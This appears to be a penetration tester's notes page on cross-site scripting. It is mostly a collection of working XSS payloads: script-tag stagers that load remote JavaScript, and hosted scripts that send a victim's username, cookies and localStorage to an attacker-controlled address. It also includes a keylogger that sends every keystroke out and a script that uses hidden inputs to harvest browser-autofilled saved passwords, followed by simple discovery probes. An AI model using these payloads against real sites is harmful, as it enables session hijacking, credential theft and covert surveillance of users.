Skip to content

Cross Site Scripting (XSS)

Info

This note is still in development.

Overview


Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.

Payloads


Stagers


Attacker Server-Side:

# Hosting a Simple HTTP Server
python -m http.server 80

# or Custom PMA Server
python ./pma_server.py

Victim Payload:

// Standard
<script src="http://<ip_addr>/<xss_payload>.js"></script>
<img src="http://<ip_addr>/<xss_payload>.js"/>

// URL Encoded
%3Cscript%20src=%22http://<ip_addr>/<xss_payload>.js%22%3E

// Extended
<html><body><script src="http://<ip_addr>/<xss_payload>.js"></script></body></html>

// URL Encoded
%3Chtml%3E%3Cbody%3E%3Cscript%20src=%22http://<ip_addr>/<xss_payload>.js%22%3E%3C/script%3E%3C/body%3E%3C/html%3E

Username Extraction


Hosted Payload:
- xss_username.js

var ClientAPI = "https://<ip_addr>:<port>/api/me"
var AttackerURL = "http://<ip_addr>:<port>"
fetch(ClientAPI, {
        method:'GET',
        mode:'cors',
        credentials:'include'
    })
    .then(response => response.json())
    .then((data) => {
        fetch([AttackerURL, "/username?=", data.username].join(''), {
          mode: 'no-cors'
        });
    });

Output:
Pasted image 20231015202903.png


  • document.cookie = deprecated browser cookie storage that is becoming less common due to the HttpOnly flag.

Hosted Payload:
- xss_document_cookie.js

var AttackerURL = "http://<ip_addr>:<port>"
var DocumentCookie = encodeURIComponent(document.cookie)
fetch([AttackerURL, "/docCookie?=", DocumentCookie].join(''), {
    mode: 'no-cors'
});

Output:
- TBD


  • localStorage = will keep the data until explicitly deleted.
  • sessionStorage = will keep the data until the tab is closed.

Hosted Payload:
- xss_local_cookie.js

var AttackerURL = "http://<ip_addr>:<port>"
var LocalSecretsCookie = encodeURIComponent(JSON.stringify(localStorage))
fetch([AttackerURL, "/localCookie?=", LocalSecretsCookie].join(''), {
    mode: 'no-cors'
});

Output:
Pasted image 20231015202927.png

Keylogger


Hosted Payload:
- xss_keylogger.js

var AttackerURL = "http://<ip_addr>:<port>"
function logKey(event){
    fetch([AttackerURL, "/key?=", event.key].join(''))
}
document.addEventListener('keydown', logKey)

Output:
Pasted image 20231015203009.png

Saved Password Extraction


Hosted Payload:
- xss_credentials.js

var AttackerURL = "http://192.168.49.63"
let body = document.getElementsByTagName("body")[0]
// Username
var u = document.createElement("input");
u.type = "text";
u.style.position = "fixed";
u.style.opacity = "0";
// Password
var p = document.createElement("input");
p.type = "password";
p.style.position = "fixed";
p.style.opacity = "0";
// Extract
body.append(u)
body.append(p)
setTimeout(function(){
    fetch([AttackerURL, "/user?=", u.value, "&pass?=", p.value].join(''))
}, 5000);

Output:
- TBD

Discovery


Validate Javascript XSS

<script>alert('Whoops!')</script>

<script>src="http://192.168.49.63"</script>

# If bold, site is vulnerable to XSS
<h1>Hello World</h1>